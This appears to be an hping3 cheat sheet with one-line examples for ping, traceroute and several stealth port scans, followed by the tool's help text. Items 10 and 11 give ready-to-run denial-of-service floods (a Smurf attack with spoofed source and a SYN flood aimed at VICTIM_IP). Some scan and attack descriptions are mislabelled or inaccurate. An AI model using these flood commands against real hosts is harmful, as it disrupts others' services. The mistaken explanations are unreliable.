


1. Testing ICMP: In this example hping3 will behave like a normal ping utility, sending ICMP-echo und receiving ICMP-reply

hping3 -1 0daysecurity.com

2. Traceroute using ICMP: This example is similar to famous utilities like tracert (windows) or traceroute (linux) who uses ICMP packets increasing every time in 1 its TTL value.

hping3 --traceroute -V -1 0daysecurity.com

3. Checking port: Here hping3 will send a Syn packet to a specified port (80 in our example). We can control also from which local port will start the scan (5050).

hping3 -V -S -p 80 -s 5050 0daysecurity.com

4. Traceroute to a determined port: A nice feature from Hping3 is that you can do a traceroute to a specified port watching where your packet is blocked. It can just be done by adding --traceroute to the last command.

hping3 --traceroute -V -S -p 80 -s 5050 0daysecurity.com

5. Other types of ICMP: This example sends a ICMP address mask request ( Type 17 ).

hping3 -c 1 -V -1 -C 17 0daysecurity.com

6. Other types of Port Scanning: First type we will try is the FIN scan. In a TCP connection the FIN flag is used to start the connection closing routine. If we do not receive a reply, that means the port is open. Normally firewalls send a RST+ACK packet back to signal that the port is closed..

hping3 -c 1 -V -p 80 -s 5050 -F 0daysecurity.com

7. Ack Scan: This scan can be used to see if a host is alive (when Ping is blocked for example). This should send a RST response back if the port is open.

hping3 -c 1 -V -p 80 -s 5050 -A 0daysecurity.com

8. Xmas Scan: This scan sets the sequence number to zero and set the URG + PSH + FIN flags in the packet. If the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is open, the target discards the TCP Xmas scan, sending no reply.

hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF 0daysecurity.com

9. Null Scan: This scan sets the sequence number to zero and have no flags set in the packet. If the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is open, the target discards the TCP NULL scan, sending no reply.

hping3 -c 1 -V -p 80 -s 5050 -Y 0daysecurity.com

10. Smurf Attack: This is a type of denial-of-service attack that floods a target system via spoofed broadcast ping messages.

hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS

11. DOS Land Attack:

hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP

--flood: sent packets as fast as possible. Don't show replies.

--rand-dest: random destionation address mode. see the man.


-c --count: packet count

-d --data: data size

-S --syn: set SYN flag

-w --win: winsize (default 64)

-p --destport [+][+] destination port(default 0) ctrl+z inc/dec

-s --baseport: base source port (default random)

Anex A Hping3 Help

usage: hping3 host [options]

-h --help show this help

-v --version show version

-c --count packet count

-i --interval wait (uX for X microseconds, for example -i u1000)

--fast alias for -i u10000 (10 packets for second)

--faster alias for -i u1000 (100 packets for second)

--flood sent packets as fast as possible. Don't show replies.

-n --numeric numeric output

-q --quiet quiet

-I --interface interface name (otherwise default routing interface)

-V --verbose verbose mode

-D --debug debugging info

-z --bind bind ctrl+z to ttl (default to dst port)

-Z --unbind unbind ctrl+z

--beep beep for every matching packet received


default mode TCP

-0 --rawip RAW IP mode

-1 --icmp ICMP mode

-2 --udp UDP mode

-8 --scan SCAN mode.

Example: hping --scan 1-30,70-90 -S www.target.host

-9 --listen listen mode


-a --spoof spoof source address

--rand-dest random destionation address mode. see the man.

--rand-source random source address mode. see the man.

-t --ttl ttl (default 64)

-N --id id (default random)

-W --winid use win* id byte ordering

-r --rel relativize id field (to estimate host traffic)

-f --frag split packets in more frag. (may pass weak acl)

-x --morefrag set more fragments flag

-y --dontfrag set dont fragment flag

-g --fragoff set the fragment offset

-m --mtu set virtual mtu, implies --frag if packet size > mtu

-o --tos type of service (default 0x00), try --tos help

-G --rroute includes RECORD_ROUTE option and display the route buffer

--lsrr loose source routing and record route

--ssrr strict source routing and record route

-H --ipproto set the IP protocol field, only in RAW IP mode


-C --icmptype icmp type (default echo request)

-K --icmpcode icmp code (default 0)

--force-icmp send all icmp types (default send only supported types)

--icmp-gw set gateway address for ICMP redirect (default

--icmp-ts Alias for --icmp --icmptype 13 (ICMP timestamp)

--icmp-addr Alias for --icmp --icmptype 17 (ICMP address subnet mask)

--icmp-help display help for others icmp options


-s --baseport base source port (default random)

-p --destport [+][+] destination port(default 0) ctrl+z inc/dec

-k --keep keep still source port

-w --win winsize (default 64)

-O --tcpoff set fake tcp data offset (instead of tcphdrlen / 4)

-Q --seqnum shows only tcp sequence number

-b --badcksum (try to) send packets with a bad IP checksum many systems will fix the IP checksum sending the packet so you'll get bad UDP/TCP checksum instead.

-M --setseq set TCP sequence number

-L --setack set TCP ack

-F --fin set FIN flag

-S --syn set SYN flag

-R --rst set RST flag

-P --push set PUSH flag

-A --ack set ACK flag

-U --urg set URG flag

-X --xmas set X unused flag (0x40)

-Y --ymas set Y unused flag (0x80)

--tcpexitcode use last tcp->th_flags as exit code

--tcp-timestamp enable the TCP timestamp option to guess the HZ/uptime


-d --data data size (default is 0)

-E --file data from file

-e --sign add 'signature'

-j --dump dump packets in hex

-J --print dump printable characters

-B --safe enable 'safe' protocol

-u --end tell you when --file reached EOF and prevent rewind

-T --traceroute traceroute mode (implies --bind and --ttl 1)

--tr-stop Exit when receive the first not ICMP in traceroute mode

--tr-keep-ttl Keep the source TTL fixed, useful to monitor just one hop

--tr-no-rtt Don't calculate/show RTT information in traceroute mode

ARS packet description (new, unstable)

--apd-send Send the packet described with APD (see docs/APD.txt)

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